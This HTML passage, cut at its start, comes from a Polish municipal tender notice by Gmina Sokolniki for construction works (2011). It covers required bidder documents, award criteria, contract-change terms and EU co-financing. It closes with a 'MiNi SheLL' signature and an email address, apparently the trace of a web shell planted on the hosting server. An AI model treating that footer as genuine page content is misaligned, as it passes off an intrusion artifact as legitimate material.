<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wykaz co najmniej 3 robót budowlanych, o wartości każdej roboty nie mniejszej  
    niż 380.000,00 zł (brutto), wykonanych w okresie pięciu lat przed dniem 
    wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres 
    prowadzenia  działalności jest krótszy - w tym okresie, odpowiadającym swoim 
    rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, 
    z podaniem ich wartości oraz daty i miejsca wykonywania oraz załączeniem 
    dokumentów potwierdzających, że roboty te zostały wykonane należycie.
    b) potwierdzeniem wykazu wykonanych robót budowlanych mogą być :        
       - referencje, 
       - protokoły odbioru,
       - lub inne, z których wynikałaby rzetelność wykonanych robót.
Przez roboty odpowiadające swoim rodzajem i wartością rozumie się - roboty tożsame
z przedmiotem niniejszego zamówienia publicznego na roboty budowlane.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia lub dokumenty niezbędne do przeprowadzenia postępowania, które należy dołączyć do oferty : 
a) pełnomocnictwo lub umowa podmiotów występujących wspólnie wskazująca, że osoba występująca w imieniu Wykonawcy jest do tego upoważniona, jeżeli nie wynika to z załączonych do oferty dokumentów, 
b) dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmiany umowy zgodnie z art.144 ustawy, w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia następujących warunków, warunki istotne, w szczególności zmiana terminu wykonania zamówienia,
 a) w razie wystąpienia siły wyższej, czyli losowego zdarzenia zewnętrznego, którego skutków nie da się przewidzieć, np.huragan, powódź, ulewne deszcze, a także w razie konieczności podjęcia działań zmierzających do ograniczenia skutków wystąpienia siły wyższej,b) warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych np.gwałtowne opady deszczu, burze z wyładowaniami atmosferycznymi,upałami), w razie zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin wykonania przedmiotu umowy.
Warunkiem wprowadzenia do zawartej umowy zmiany, o których mowa powyżej będzie potwierdzenie okoliczności w formie opisowej i właściwe umotywowanej zaakceptowanej przez każdą ze stron. W przypadku wystąpienia okoliczności, o których mowa powyżej strony ustalają nowe terminy wykonania przedmiotu umowy z zastrzeżeniem, że okres przesunięcia terminu wykonania równy będzie co najmniej okresowi przerwy w wykonaniu przedmiotu umowy.Wszelkie zmiany niniejszej umowy powinny być dokonane w formie pisemnej (aneksu podpisanego przez obie strony) pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sokolniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sokolniki,
ul. Marszałka Józefa Piłsudskiego 1
98 - 420 Sokolniki
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2011 godzina 11:00, miejsce: Urząd Gminy Sokolniki
ul. Marszałka Józefa Piłsudskiego 1
98 - 420 Sokolniki
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie współfinansowane będzie w ramach działania 4.1 Wdrażanie lokalnych strategii rozwoju  odpowiadającą warunkom przyznania pomocy w ramach działania ; Odnowa i rozwój wsi na obszarze LSR, realizowanej przez lokalna grupę działania o nazwie : Między Prosną a Wartą - Lokalna  Grupa Działania.
Projekt  współfinansowany ze środków Unii Europejskiej w ramach działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie Operacji Odpowiadających Warunkom Przyznawania Pomocy w ramach działanie Odnowa i rozwój wsi Objętego PROW na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com